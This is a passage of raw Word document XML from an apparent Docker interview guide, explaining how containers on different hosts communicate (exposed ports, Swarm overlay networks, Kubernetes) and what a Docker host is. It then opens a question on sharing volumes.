          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public port</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE9D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From container A, make a request to http://&lt;Host-B-IP&gt;:&lt;exposed-port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22231A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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B71D9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B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F68E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p 8080:8080 my-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB9F58" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DACC4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A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8015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curl http://&lt;Host-B-IP&gt;:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058DA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FE77FE">
          <v:rect id="_x0000_i3627" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC8DCE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2. Overlay Network (Swarm Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D0935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 use </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Swarm</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can create an </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overlay network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing containers on different hosts to communicate </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>as if they’re on the same network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B24F2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Initialize Swarm on one host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9227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init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F53401" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D8B14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Join the second host to the swarm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414C88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join --token &lt;token&gt; &lt;manager-ip&gt;:2377</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5CD833" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DF067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lastRenderedPageBreak/>
        <w:t># Create overlay network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47084A2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d overlay my-overlay-network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241210EA" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="009156EA" w:rsidRDefault="00BF7CA0" w:rsidP="009156EA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641FAAC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Deploy services to use this network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE8C42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ervice create --name service1 --network my-overlay-network my-image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BAF1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4E3C0B">
          <v:rect id="_x0000_i3628" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD55E7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3. Kubernetes Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37951F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re using </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, it provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>flat network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>every pod can reach every other pod</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF55DF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6233A3">
          <v:rect id="_x0000_i3629" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5623D64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4. Manual Tunneling (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF54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can set up </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VPNs, SSH tunnels</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VxLANs</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to connect hosts at the network level — more complex and rarely used if you can use Swarm or Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB965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63AC2F">
          <v:rect id="_x0000_i3630" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70845243"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hat Won’t Work Directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F54C46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efault bridge network is </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>local to the host</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200A5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tainer names (DNS resolution) work </w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only within a Docker network</w:t>
      </w:r>
      <w:r w:rsidRPr="009156EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, not across machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC1E85"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17B36">
          <v:rect id="_x0000_i3631" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="265B9EB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878"/>
        <w:gridCol w:w="2639"/>
      </w:tblGrid>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="17D24758" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E4E0D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mmunication Across Hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E929CCE"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="799658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tainer-to-Container DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="3518716E" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7907B96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ublic IP + Exposed Ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385FCA3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imple, but not secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DDD12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t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009156EA" w:rsidRPr="009156EA" w14:paraId="70574987" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C46BA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 Overlay Net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B6254E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Recommended in Docker world</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="665F47E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3089AA0B" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FACB89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Kubernetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0032CFD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Best for microservices at scale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="385BB0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45016481" w14:textId="77777777" w:rsidTr="009156EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C4D2A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Networking (VPNs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2754496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Advanced use cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67911C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ossible with setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D12AC33" w14:textId="2913D51F"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632" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB8116" w14:textId="4229D785" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00145C74">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="897" w:name="_Toc197868111"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the host in this case</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="897"/>
    </w:p>
    <w:p w14:paraId="2B0B9BC1" w14:textId="2AA2D70B"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n Docker terminology, a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refers to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>physical machine or virtual machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on which Docker is installed and running containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7762FC13"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6B9DE">
          <v:rect id="_x0000_i3633" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6D514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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2D0E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t’s say you have two Linux servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A500C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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IP: 192.168.1.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C1B2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w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (IP: 192.168.1.20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B665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host has Docker installed, and you’re running containers on them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2DB0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A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A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B9B10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B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B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC91B5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55BE1">
          <v:rect id="_x0000_i3634" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A51C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o in this case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569083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is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> running the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112C7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containers are </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isolated processes</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the host but rely on the host's kernel and network configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877BF5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2A59A">
          <v:rect id="_x0000_i3635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3293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Visual Representation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F802CE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A (192.168.1.10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23471CD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7A2A413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A1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215B8E5" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00127EBD" w:rsidRDefault="00BF7CA0" w:rsidP="00127EBD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56630D3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B (192.168.1.20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FF09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432F174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B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D265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Container A1 needs to talk to B1 (e.g., via HTTP), it must go through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D46A6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s IP + exposed port of Container B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B032EB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r use </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overlay network</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if both hosts are in Docker Swarm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5D855" w14:textId="6704628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636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F05DAAD" w14:textId="45353774" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00B743D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="898" w:name="_Toc197868112"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Imagine you have one volume and you want to share it with multiple containers? How will you do it</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="898"/>
    </w:p>
    <w:p w14:paraId="16A565DC" w14:textId="4C0DA6F9"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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>share a single Docker volume across multiple containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00127EBD">
        <w:rPr>
